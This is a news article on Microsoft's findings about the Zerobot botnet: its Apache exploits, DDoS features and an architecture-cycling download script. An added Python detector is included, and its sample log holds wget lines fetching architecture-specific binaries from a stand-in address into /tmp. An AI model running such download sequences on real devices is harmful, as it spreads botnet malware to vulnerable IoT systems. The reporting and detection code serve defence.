Date: 2022-12-23



In addition to exploiting vulnerabilities in Apache, Zerobot also has new DDoS attack capabilities, according to Microsoft researchers. (Photo by Stephen Lam/Getty Images)

Microsoft researchers reported that the latest distribution of Zerobot includes additional features, such as exploiting vulnerabilities in Apache and Apache Spark (CVE-2021-42013 and CVE-2022-33891, respectively) and new DDoS attack capabilities.

In a December 21st blog post, Microsoft Security Threat Intelligence (MSTI) researchers described Zerobot as a Go-based botnet that spreads primarily through vulnerabilities in IoT and web applications.

According to MSTI, Zerobot injects a malicious payload once it gains device access. This could be a generic script called zero.sh that downloads Zerobot and tries to run it, or a script that downloads the Zerobot binary for a specific architecture.

According to the researchers, the script that downloads the various Zerobot binaries brute-forces the architecture: it downloads and executes binaries for different architectures until one succeeds.
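For defenders, this try-every-architecture behaviour leaves a recognisable trace in process-execution logs. The following is an added example, not code from Microsoft's report or from Zerobot: it flags hosts that fetch binaries for several CPU architectures within a short window. The log format, host names, file names, addresses, window and threshold are all assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed list of architecture tokens seen in Linux binary names; extend as needed.
ARCHES = ["x86_64", "aarch64", "ppc64le", "riscv64", "mipsel", "mips64", "amd64",
          "arm64", "i386", "i686", "mips", "arm", "386"]
ARCH_RE = re.compile(r"(?<![a-z0-9])(" + "|".join(ARCHES) + r")(?![a-z0-9])")
FETCH_RE = re.compile(r"\b(?:wget|curl)\b")
URL_RE = re.compile(r"https?://[^\s;|&]+")

def arch_of(url):
    """Return the architecture token in the URL's file name, or None."""
    m = ARCH_RE.search(url.rsplit("/", 1)[-1].lower())
    return m.group(1) if m else None

def find_arch_bruteforce(lines, window=timedelta(seconds=120), min_arches=3):
    """Map host -> architectures if it fetched >= min_arches of them within window."""
    events = defaultdict(list)  # host -> [(time, arch)]
    for line in lines:
        parts = line.split(None, 2)  # "<ISO time> <host> <command>"
        if len(parts) < 3 or not FETCH_RE.search(parts[2]):
            continue  # malformed line or not a download command
        try:
            ts = datetime.fromisoformat(parts[0])
        except ValueError:
            continue  # skip lines without a parseable timestamp
        for url in URL_RE.findall(parts[2]):
            if (arch := arch_of(url)):
                events[parts[1]].append((ts, arch))
    flagged = {}
    for host, evs in events.items():
        evs.sort()
        for start, _ in evs:  # slide the window over each event in time order
            seen = {a for t, a in evs if start <= t <= start + window}
            if len(seen) >= min_arches:
                flagged[host] = sorted(seen)
                break
    return flagged

# Constructed sample log (hypothetical hosts, documentation-range addresses).
SAMPLE_LOG = [
    "2022-12-21T10:00:01 cam-01 wget http://198.51.100.7/sample.arm -O /tmp/s",
    "2022-12-21T10:00:03 cam-01 wget http://198.51.100.7/sample.mips -O /tmp/s",
    "2022-12-21T10:00:05 cam-01 wget http://198.51.100.7/sample.x86_64 -O /tmp/s",
    "2022-12-21T10:05:00 build-02 curl -O https://192.0.2.10/tool-linux-amd64.tar.gz",
    "2022-12-21T11:30:00 build-02 curl -O https://192.0.2.10/tool-linux-arm64.tar.gz",
]
if __name__ == "__main__":
    print(find_arch_bruteforce(SAMPLE_LOG))
```

The build host that pulls two release archives more than an hour apart is not flagged; only the device that cycles through three architectures in seconds is.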

Viakoo CEO Bud Broomhead says the way Zerobot and other botnet armies are formed is a serious problem. Broomhead also added that the size, frequency and duration of DDoS attacks have increased by more than 90% year-over-year. This is because the spread of bots like Zerobot is largely unchecked.

According to Broomhead, attackers always launch attacks where defenses are weakest and where exploits are most likely. This is exactly what IoT and OT devices offer today. Many cyber defenses rely on agent-based technology to protect IT systems. IoT/OT devices cannot accept agents, so IT-oriented solutions are not effective in stopping threats like Zerobot.

Coalfire vice president Andrew Barratt said malware with the ability to affect IoT devices should raise eyebrows among security teams. Barratt said the findings could shed light on everything from a privacy standpoint to more serious life implications.

Imagine malware that manipulates your heating system in exchange for ransomware-style payments, says Barratt. Security teams and end-consumers of IoT devices should avoid exposing IoT devices directly to the internet by locking down the devices and preferably firewalling the affected ports to prevent them from easily connecting to each other.

